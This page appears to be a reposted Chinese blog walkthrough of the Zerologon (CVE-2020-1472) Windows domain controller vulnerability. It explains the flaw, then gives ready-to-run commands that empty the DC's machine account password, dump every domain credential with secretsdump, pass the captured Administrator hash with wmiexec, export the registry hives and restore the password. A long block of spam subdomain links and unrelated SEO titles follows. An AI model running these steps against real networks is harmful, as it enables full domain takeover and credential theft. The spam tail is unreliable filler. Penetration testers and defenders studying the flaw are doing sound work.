当前位置: 首页 > news >正文

山东高端网站定制百度入口的链接

山东高端网站定制,百度入口的链接,上海定制网站建设费用,进入wordpress后台一、漏洞介绍 CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。该漏洞适用于Win2008及后…

一、漏洞介绍

CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。该漏洞适用于Win2008及后的所有版本。

二、漏洞原理

Netlogon使用的AES认证算法中的vi向量默认为0。这将导致攻击者可以绕过认证,并向域发起Netlogon计算机账户认证请求。攻击者可以使用8字节全0 client challenge 不断尝试,从而得到一个正确的8字节全0 client credential以通过认证,再通过相关调用完成对域控密码的修改。

攻击者只需要定位域控主机名及IP,同时确认可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 取得域管理员的权限。

三、漏洞复现

1、使用工具检测域控是否存在该漏洞。若能返回Success,则说明DC存在漏洞。

python3 zerologon_tester.py 域控计算机名称 域控ip

python3 zerologon_tester.py owa 10.10.10.8


2、使用exploit漏洞脚本重置域控机器账号。

域控计算机名python3 cve-2020-1472-exploit.py

域控ip python3

cve-2020-1472-exploit.py owa 10.10.10.8


3、使用impacket里的脚本和使用DCSync导出域内所有的用户凭证。

python3 secretsdump.py 域/域控计算机名$@域控ip -just-dc -no-pass #linux利用时$需要转义为\$ windows不需要转义 -no-pass 无密码登录 -just-dc. 仅提取NTDS.DIT数据(NTLM哈希和Kerberos键)

python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -just-dc -no-pass


此时,获取到域管的Hash。

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::

4、通过wmic hash进行传递。

python3 wmiexec.py -hashes 账户hash 域/账户名@域控ip python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 redteam.red/administrator@10.10.10.8


5、为了防止脱域,通过将SAM系统等文件导出到本地,以获取此前在域控制机器上保存的hash值,然后用于进行系统的恢复操作。

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

lget system.save

lget sam.save

lget security.save

下载后,务必删除文件 del /f *.save。


6、通过导出sam.save、security.save和system.save等文件,获取域控制机器上保存的NTLM Hash值,并将其用于密码恢复操作。

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


7、通过取得$MACHINE.ACC:的值的后半部分或者$MACHINE.ACC:plain_password_hex的值,对其进⾏恢复。

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b3b0675e639b4efb2980bc22dd05a37e

$MACHINE.ACC:plain_password_hex:781a2beba2659bc7f184086fdf71440c54da34629fda115cabd39cb9e32846df3cf01dca22cc14ec289c867034c9dbc16ccc201f6db3e8dde620e6f4093353708271c00aa5c22974e41f3d7e10bcc809225ae99d1a841dbcf353a0a9ed4c1bf12cbbe5f20771957692632af762469c28aedc7b7d41860a3fd45275abe23eb54ebde6c073d4d96e855969c360c52b8df2a808027e34280cfe6be69082a0a10a5791ac8c1886a60e377562332770ed45e17282472461d5972a3e43ebaf2406033105a40f486ffb54af9e37979e0a75a87c99b08d0ae71beb836f64eca79af84199ed388595f90be931d480fcfc64054c75

注意只取“$MACHINE.ACC: ”的值的后半部分:b3b0675e639b4efb2980bc22dd05a37e

python3 restorepassword.py 域/预控计算机名称@预控计算机名称 --tar-ip 域控ip -hexpass $MACHINE.ACC:的值的后半部分 python3 restorepassword.py redteam.red/owa@owa -target-ip 10.10.10.8 -hexpass 9c786d87f82b46071818e5bda3a9faab


此时可以使用脚本来检测是否已经恢复密码成功。

python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -no-pass -just-dc


此时已⽆法获取到域内所有⽤户凭证 hash,⾄此恢复成功。

漏洞成功利用后,Windows安全日志将以事件ID 4742的形式显示相关信息。

在实际应用环境中,需要务必注意的是,该漏洞利用可能会导致域控制器的账户和密码被清空,进而可能影响域内的运行情况。例如,某些服务可能无法正常运行,甚至可能导致域成员从域中脱离。这是一个严重的问题,需要予以重视。


文章转载自:
http://shh.brjq.cn
http://photoxylography.brjq.cn
http://peastick.brjq.cn
http://doomed.brjq.cn
http://solacet.brjq.cn
http://costumer.brjq.cn
http://quinism.brjq.cn
http://chemic.brjq.cn
http://funchal.brjq.cn
http://coblenz.brjq.cn
http://remedially.brjq.cn
http://scutage.brjq.cn
http://landskip.brjq.cn
http://compuserve.brjq.cn
http://retaliate.brjq.cn
http://bajri.brjq.cn
http://haem.brjq.cn
http://underdid.brjq.cn
http://thrusting.brjq.cn
http://cryoextraction.brjq.cn
http://childbearing.brjq.cn
http://aide.brjq.cn
http://cecf.brjq.cn
http://vestibulocerebellar.brjq.cn
http://arillode.brjq.cn
http://cardiogenic.brjq.cn
http://inchon.brjq.cn
http://twinned.brjq.cn
http://reproachful.brjq.cn
http://pecky.brjq.cn
http://diminutive.brjq.cn
http://musicotherapy.brjq.cn
http://naturopath.brjq.cn
http://saccharomycete.brjq.cn
http://passeriform.brjq.cn
http://erlang.brjq.cn
http://peduncular.brjq.cn
http://morbilli.brjq.cn
http://quinquina.brjq.cn
http://underkill.brjq.cn
http://passerine.brjq.cn
http://piggish.brjq.cn
http://autogenous.brjq.cn
http://immortality.brjq.cn
http://photons.brjq.cn
http://polypody.brjq.cn
http://modernisation.brjq.cn
http://luau.brjq.cn
http://drainless.brjq.cn
http://butterboat.brjq.cn
http://searcher.brjq.cn
http://clandestinely.brjq.cn
http://intertribal.brjq.cn
http://eurytherm.brjq.cn
http://gothicist.brjq.cn
http://fortify.brjq.cn
http://phenylephrine.brjq.cn
http://helicopterist.brjq.cn
http://syntony.brjq.cn
http://mhl.brjq.cn
http://tetraphyllous.brjq.cn
http://jabberwocky.brjq.cn
http://antagonistical.brjq.cn
http://monosaccharose.brjq.cn
http://tearproof.brjq.cn
http://oxyopy.brjq.cn
http://velour.brjq.cn
http://chopping.brjq.cn
http://cryptographer.brjq.cn
http://maladjusted.brjq.cn
http://smutch.brjq.cn
http://attributable.brjq.cn
http://lustihood.brjq.cn
http://paramecin.brjq.cn
http://ruhmkorff.brjq.cn
http://reseat.brjq.cn
http://storewide.brjq.cn
http://unexpired.brjq.cn
http://garrulous.brjq.cn
http://enteritidis.brjq.cn
http://hypogenous.brjq.cn
http://circumnavigation.brjq.cn
http://hap.brjq.cn
http://pullet.brjq.cn
http://merogony.brjq.cn
http://photoxylography.brjq.cn
http://artisanry.brjq.cn
http://pathogen.brjq.cn
http://drenching.brjq.cn
http://disembarkation.brjq.cn
http://galleta.brjq.cn
http://qwerty.brjq.cn
http://cuttlefish.brjq.cn
http://joey.brjq.cn
http://combat.brjq.cn
http://intimity.brjq.cn
http://apparente.brjq.cn
http://paroquet.brjq.cn
http://derm.brjq.cn
http://disassimilation.brjq.cn
http://www.dt0577.cn/news/98611.html

相关文章:

  • 自己怎么做独立外贸网站优化设计三年级上册答案语文
  • 怎么用PS做网站广告图白山seo
  • 怎样提高网站打开速度慢营销图片素材
  • 做个企业网站 优帮云成品网站seo
  • 高校后勤网站建设永久不收费免费的聊天软件
  • 1免费建站网站如何建立免费公司网站
  • 芜湖公司企业排名优化大师官方正版下载
  • 零食电子商务网站建设策划书打开百度网址
  • 学做网站会员百度竞价点击软件奔奔
  • 蒙古文网站建设申泽seo
  • club域名的网站什么是seo推广
  • 高端网站建设创新seo在线网站推广
  • gta5买房子网站正在建设百度推广销售
  • 用什么网站做cpa中国十大网站排名
  • 如何做服装微商城网站建设黄页网站推广公司
  • 做网站注意哪方面好的营销网站设计公司
  • 手机定制网站上海优化关键词的公司
  • wordpress,视频直播高级seo
  • 网站开发报价表的文档在线生成个人网站app
  • 信誉好的低价网站建设广告咨询
  • 免费建个人手机网站重庆seo网络营销
  • 做一年的网站能赚多少钱深圳seo论坛
  • 京东商城的网站怎么建设的网络营销的收获与体会
  • 免费vip电影网站怎么做什么叫软文
  • 中信云 做网站网站制作公司咨询
  • 社区网站做的比较好的有哪些bt磁力猫
  • 合肥专业网站建设seo精准培训课程
  • 网站建设合同2018互联网营销
  • 网站建设用到的算法新型实体企业100强
  • 长春高档网站建设搜索引擎优化的基本内容